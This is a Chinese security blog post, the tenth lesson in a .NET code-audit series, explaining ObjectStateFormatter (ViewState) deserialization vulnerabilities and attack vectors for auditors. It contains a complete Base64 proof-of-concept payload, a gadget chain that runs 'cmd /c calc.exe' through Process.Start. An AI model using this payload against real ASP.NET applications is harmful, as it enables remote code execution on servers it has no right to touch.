.NET高级代码审计(第十课) ObjectStateFormatter反序列化漏洞

原创 已于 2024-06-28 11:23:14 修改 · 1.9k 阅读 · 45 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#.net #网络 #安全 #矩阵 #asp.net #web安全

于 2023-12-26 08:30:00 首次发布
本文详细介绍了ObjectStateFormatter在.NET中的序列化和反序列化过程,展示了如何通过重写ISerializationSurrogate引发远程代码执行(RCE)攻击,以及如何进行代码审计和安全防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 前言

ObjectStateFormatter一般用于序列化和反序列化状态对象图,常用的ViewState就是通过这个类做序列化的,位于命名空间 System.Web.UI优点在于对基础类型存储在pair、Hashtable等数据结构里的时候序列化速度很快。但是使用反序列化不受信任的二进制文件会导致反序列化漏洞从而实现远程RCE攻击,本文笔者从原理和代码审计的视角做了相关介绍和复现。

0x01 ObjectStateFormatter序列化

下面通过使用ObjectStateFormatter类序列化一个实例来说明问题,首先定义TestClass对象

定义了三个成员,并实现了一个静态方法ClassMethod启动进程。 序列化通过创建对象实例分别给成员赋值

同BinaryFormatter一样,常规下使用Serialize得到序列化后二进制文件内容

0x02 ObjectStateFormatter反序列化

2.1、反序列化用法

反序列过程是将二进制数据转换为对象,通过创建一个新对象的方式调用Deserialize方法实现的 ,查看ObjectStateFormatter格式化器定义一样实现了IFormatter接口

笔者通过创建新对象的方式调用Deserialize方法实现的具体实现代码可参考以下

反序列化后得到TestClass类的成员Name的值。

2.2、攻击向量—ActivitySurrogateSelector

由于上一篇中已经介绍了漏洞的原理,所以本篇就不再冗余的叙述,没有看的朋友请参考《.NET高级代码审计(第八课) SoapFormatter反序列化漏洞》,不同之处是用了ObjectStateFormatter类序列化数据,同样也是通过重写ISerializationSurrogate 调用自定义代码,笔者这里依旧用计算器做演示,生成的二进制文件打开后如下图

按照惯例用ObjectStateFormatter类的Deserialize方法反序列化

最后反序列化成功后弹出计算器,但同样也抛出了异常,在WEB服务情况下会返回500错误。

2.3、攻击向量—PSObject

由于笔者的windows主机打过了CVE-2017-8565(Windows PowerShell远程代码执行漏洞的补丁,利用不成功,所以在这里不做深入探讨,有兴趣的朋友可以自行研究。有关于补丁的详细信息参考:

Windows Server 2008 中 Windows PowerShell 远程执行代码漏洞的安全更新:2017 年 7 月 11 日 - Microsoft 支持

0x03 代码审计视角

3.1、Deserialize

从代码审计的角度找到漏洞的EntryPoint,Deserialize有两个重载分别可反序列化Stream和字符串数据,其中字符串可以是原始的Raw也可以是文档中说的Base64字符串,两者在实际的反序列化都可以成功。

下面是不安全的代码:

攻击者只需要控制传入字符串参数path便可轻松实现反序列化漏洞攻击。

也可以使用下面的这段不安全代码触发漏洞:

请求Base64的Poc可成功触发弹出计算器

/wEyxBEAAQAAAP8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAACy9jIGNhbGMuZXhlBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA%2BU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=

最后附上动图效果图

0x04 总结

实际开发中ObjectStateFormatter通常用在处理ViewState状态视图,虽说用的频率并不高,一旦未注意到数据反序列化安全处理,会产生反序列化漏洞。最后.NET反序列化系列课程笔者会同步到 https://github.com/Ivan1ee/ 前言 - .NET高级代码审计 后续笔者将陆续推出高质量的.NET反序列化漏洞文章,欢迎大伙持续关注,交流。

 欢迎对.NET安全关注和关心的同学加入我们,在这里能遇到有情有义的小伙伴,大家聚在一起做一件有意义的事。欢迎对.NET安全关注和关心的同学加入我们,在这里能遇到有情有义的小伙伴,大家聚在一起做一件有意义的事。

Mojarra JSF ViewState 反序列化漏洞复现
0xSec
01-10 2159
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其中最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使用。
.NET高级代码审计第十课ObjectStateFormatter反序列化漏洞1
08-03
序列化通过创建对象实例分别给成员赋值云影实验室同 BinaryFormatter 一样,常规下使用 Serialize 得到序列化后的二进制文件内容0x02 O
数据序列化处理之经验积累(3) -- ObjectStateFormatter
鱼汤的技术资料库
11-29 1784
<br />这个序列化类,优势在于对基础类型存储在hashtable,pair,tripet等数据结构里的时候,序列化相对于binaryformatter和datacontractserializer有明显的优势。<br /> <br />    public static class ObjectStateFormatSerializer<br />    {<br />        private static readonly ObjectStateFormatter InnerStateForma
CentreStack 反序列化漏洞 (CVE-2025-30406)
最新发布
misu6的博客
04-25 369
该应用程序在 IIS web.config 文件中使用了硬编码或保护当的 machineKey,而该文件负责保护 ASP.NET ViewState 数据。” 如果攻击者获取或预测了 machineKey,他们就可以伪造能够通过完整性检查的 ViewState 有效载荷。在某些情况下,这可能会导致 ViewState 反序列化攻击,从而可能导致 Web 服务器上的远程代码执行 (RCE)
ObjectStateFormatter反序列化漏洞
UKK
06-18 379
ObjectStateFormatter反序列化漏洞 http://www.ifind.cc/view/223
ASP.NETViewState反序列化利用
qq_43571759的博客
10-04 2416
ASP.NETViewState反序列化利用 做项目学到一手记录下 viewstate是什么 按键名称存储每个控件的值,如哈希表 跟踪对视图状态值的初始状态的更改 序列化和取消序列化保存的数据到客户端上的隐藏窗体字段 自动恢复回贴的 ViewState 数据 ASP.NET 支持三种同的开发模式: Web Pages(Web 页面)、MVC(Model View Controller 模型-视图-控制器)、Web Forms(Web 窗体)基于 web forms ,目的是为服务端控件状态进行持
ViewState再现漏洞:行业内又一款知名的 .NET 分析工具爆出反序列化漏洞
ahhacker86的专栏
03-07 895
.NET 中提供了丰富的状态管理机制,其中是最常见的一种。允许 Web 应用程序在页面回传时保持控件状态,无需依赖服务器端存储。然而,ViewState 的便利性也带来了潜在的安全风险——如果未正确配置,攻击者可能利用其反序列化漏洞,实现远程代码执行。本篇文章将深入剖析 ViewState 的工作原理、常见的安全隐患,以及如何通过代码审计来识别和修复可能存在的漏洞。同时,我们还将探讨等工具的出现的反序列化漏洞,帮助安全研究者更好地理解和掌控 ViewState 安全性。
.NET高级代码审计(第四课) JavaScriptSerializer反序列化漏洞1
08-03
然而,如果在反序列化过程中处理了安全的JSON数据,可能会导致反序列化攻击,甚至可能造成远程代码执行(RCE)的安全漏洞。 **0X01 JavaScriptSerializer序列化** 序列化是将对象转化为JSON格式的过程,以便在...
.NET 高级代码审计(第一课)XmlSerializer 反序列漏洞
03-07
.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML ...触发反序列化漏洞攻击(例如 DotNetNuke 任意代码执行漏洞 CVE-2017-9822),本 文笔者从原理和代码审计的视角做了相关脑图介绍和复现。
.NET高级代码审计(第六课) DataContractSerializer反序列化漏洞1
08-03
.NET框架中的反序列化漏洞是一种安全风险,特别是当使用如DataContractSerializer这样的工具时。DataContractSerializer是.NET Framework中用于序列化和反序列化数据的主要组件,主要用于Windows Communication ...
.NET高级代码审计(第八课) SoapFormatter反序列化漏洞1
08-03
代码审计在防止这类漏洞方面至关重要,开发者应检查所有序列化和反序列化代码,确保没有潜在的安全风险。此外,对于任何处理用户输入或网络数据的代码,都应该假设它是可信的,并采取适当的防御措施。 总之,理解...
深入解析 ASP.NETViewState 反序列化漏洞
qq_33163046的博客
08-28 6504
在本文中,我们深入探讨了 ASP.NET 中的 ViewState 反序列化漏洞,包括其原理、如何验证漏洞的存在、以及如何修复漏洞。通过全面理解该漏洞的工作机制,我们可以更加有效地保护应用程序免受攻击。ViewState 反序列化漏洞原理ViewState 通过 Base64 编码,将页面和控件的状态信息传递给客户端和服务器。如果 ViewState 未加密或未正确签名,攻击者可以篡改 ViewState 数据并执行恶意代码。验证漏洞存在。
软件测试:软件漏洞分析入门
01-13
初学者,学习软件漏洞分析很好的资料! 软件黑盒和白盒测试都有很详细的说明!
【转】ASP.NET ViewState详解
CPU_2的专栏
08-07 1157
作者:Infinities Loop 概述 ViewState是一个被误解很深的动物了。我希望通过此文章来澄清人们对ViewState的一些错误认识。为了达到这个目的,我决定从头到尾详细的描述一下整个ViewState的工作机制,其中我会同时用一些例子说明我文章中的观点,结论
ASP.Net ViewState 安全吗?
技术和生活
02-28 934
       最近在看到一个朋友使用工具能从ASP.Net 页面中 的 __VIEWSTATE字段中取得页面中所有控件与控件中的数据。虽然还没有听说过因为ViewState 产生什么漏洞,但感觉太有信心(给MS的补丁吓着了)。     当然了,想要对它进行一个有效的防御。在默认方式下,ASP.NET 是使用SHA1 算法对 ViewState 的 hashcode 
php5.5 反序列化利用工具_如何借助ViewStateASP.NET中实现反序列化漏洞利用
weixin_39870092的博客
11-24 1315
概述ASP.NET Web应用程序使用ViewState来维护页面状态,并在Web表单中保留数据。ViewState参数是Base64序列化后的餐胡,通常会在POST请求中通过名为“__VIEWSTATE”的隐藏参数发送。在服务器端,将对这个参数进行反序列化,并检索数据。通常可以在Web服务器上运行可以伪造有效ViewState的代码。这一过程可以在禁用MAC验证功能或掌握以下内容的情...
ViewStates反序列化情报,国外安全研究者利用 .NET 机器密钥实施代码注入攻击
ahhacker86的专栏
02-26 664
近期,Microsoft Threat Intelligence监测到一起由未知威胁行动者发起的攻击事件。该行动者利用从公开资源中获取的 .NET 机器密钥,成功注入了恶意代码,并部署了Godzilla,尽管其活动范围有限。经调查,发现问题的根源在于部分开发人员错误地从可公开访问的代码文档和存储库中整合了已公开的 .NET 机器密钥,为威胁行动者提供了可乘之机。ViewState.NET Web窗体用于在回发之间保存页面和控件状态的一种机制。
C#进阶之路:揭秘反序列化漏洞与解决方案
远程部署调试 运行安装 项目调试 二次开发 项目技术新 持续迭代 部分源码免费分享
03-24 1117
在 C# 的编程世界里,序列化是将对象的状态信息转换为一种可以存储或传输的格式的过程。这里的状态信息包括对象的属性值、内部结构等。比如,我们有一个User类,包含Name、Age等属性,当我们对这个类的实例进行序列化时,就会把这些属性的值以及它们之间的关联等信息转换为字节流、JSON 字符串或者 XML 格式。这样做的好处是,方便我们将对象保存到文件、数据库中,或者通过网络同的应用程序之间进行传输。例如,当我们要将用户的配置信息保存到本地文件时,就可以先将表示配置信息的对象序列化,然后写入文件。
.NET高级代码审计:BinaryFormatter反序列化漏洞详解
".NET高级代码审计(第九课) BinaryFormatter反序列化漏洞1" 本文主要探讨的是.NET框架中的BinaryFormatter反序列化漏洞,这是一种可能导致远程代码执行(RCE)的安全风险。BinaryFormatter是一个用于对象序列化和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

dot.Net安全矩阵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值